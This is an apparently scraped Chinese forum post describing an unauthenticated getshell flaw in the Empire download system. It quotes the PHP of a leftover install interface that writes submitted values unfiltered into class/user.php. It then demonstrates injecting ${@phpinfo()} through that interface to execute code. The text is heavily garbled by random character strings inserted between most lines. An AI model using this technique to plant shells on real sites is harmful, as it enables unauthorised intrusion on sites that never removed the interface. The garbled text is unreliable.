这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们' L3 o$ w* b8 x" d9 _1 p
. w: Q" p7 [& g: c0 h* @( X* P- [6 u8 _/ s2 B, e
这是帝国的一套下载系统 如图6 @$ W* q2 |* M1 i- g6 A
ps(不需要任何账户和密码,直接写shell) 1 t* S& P3 i, r, N# _+ P6 A
由于很多站是由于下载要整合discuz 等等一些论坛....4 Q- C: g) v$ D0 z% v: ]
1 H3 m5 C7 D+ G& B: v2 `2 }* u
而帝国他又有一个万能接口,如图 , {! m: [3 u: T9 c9 O2 r2 V1 k
6 S5 j; r+ s9 N# ^* O
0 ]) N. Z h* S" H而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码+ q; N+ X+ B( m7 H1 \9 K0 E& y# F5 F9 {
6 v. Z% x+ R* \+ W: ?9 R2 Z当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪8 ]8 [3 J# e# L# v2 M
, S& t2 Q1 W9 ^* Z) }在data/fun.php中的15行, w$ A* \0 x" d+ Q* S" q1 y3 d* @2 o
" Y8 u9 u8 g, S0 G
我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {
* q$ Y( ~6 |; V- D8 n17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干2 t- r! N; |$ ~2 ~
2 k9 d5 C" C- ? n这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);& B9 ?( r' e* p* O8 r& B9 R% M
) E/ |. t5 [. M8 W/ o, `
他将传进来的变量进行了切割,然后赋给了$filetext
. |4 {/ ^% c/ X3 ~4 l9 N/ h! g
2 c M4 A0 N# J% R% O然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了* q7 R# S v; U
; g1 y( w W3 h: j- E# U5 R我们看看写入的结果,随便填一个
" F5 B4 I3 w$ |! S% o( l$ `; @
) T# G' g- q ^9 T, H8 F" w2 u1 l- G8 G0 S; C
7 B. z: u6 Z) M/ j% B1 P6 ~
) c1 F1 g, H( `; ~ _3 p
' y7 j; K [1 B5 h8 Z# W* \2 k9 Z O2 G/ J- O3 J# d! m7 r8 n
8 r( O: }1 a3 N4 @
+ T' y: i& I' m' f" o( p$ ]4 c. z
+ d. G% X+ D& c6 O& r$ a+ R
8 H S$ D% \/ ]* e2 A5 U3 W
6 Q% h: M2 ^" {: G. J5 u; w/ c/ h, x$ q- Z
1 t8 ^5 A* _1 x D" R) |3 q
" e! b" F9 N+ S) E- C! R3 R, @9 U0 e: [- s/ ?. l) \
9 i4 p0 i% O" W
6 u! o5 ~, [' ]5 T/ ?! u7 k7 I: w I6 w: m% p/ _ m& F- k
6 e# x4 T' P( e% w# @( Z5 S7 g% b! y% Q: `
& S( p' W/ h) H$ o8 k- `( ?
z9 K2 T' Z0 Y" e
所以我们淫荡点,写个${@phpinfo()}试试 / q9 E- L% T; |* @% j) t+ a" D* z
然后访问以下class/user.php这个文件
* k6 J( V& K( C6 \+ ]+ y X) e日了吧
- e4 M- k# m6 V y" F3 p, m+ G
; c( k8 m9 p1 E: M! j8 j% u, e8 V" {
. N- Z( @' V- ]8 Z! `2 ]3 Y+ [: z) s% w+ q4 R
$ C( Z2 O4 [ h9 u- p2 e |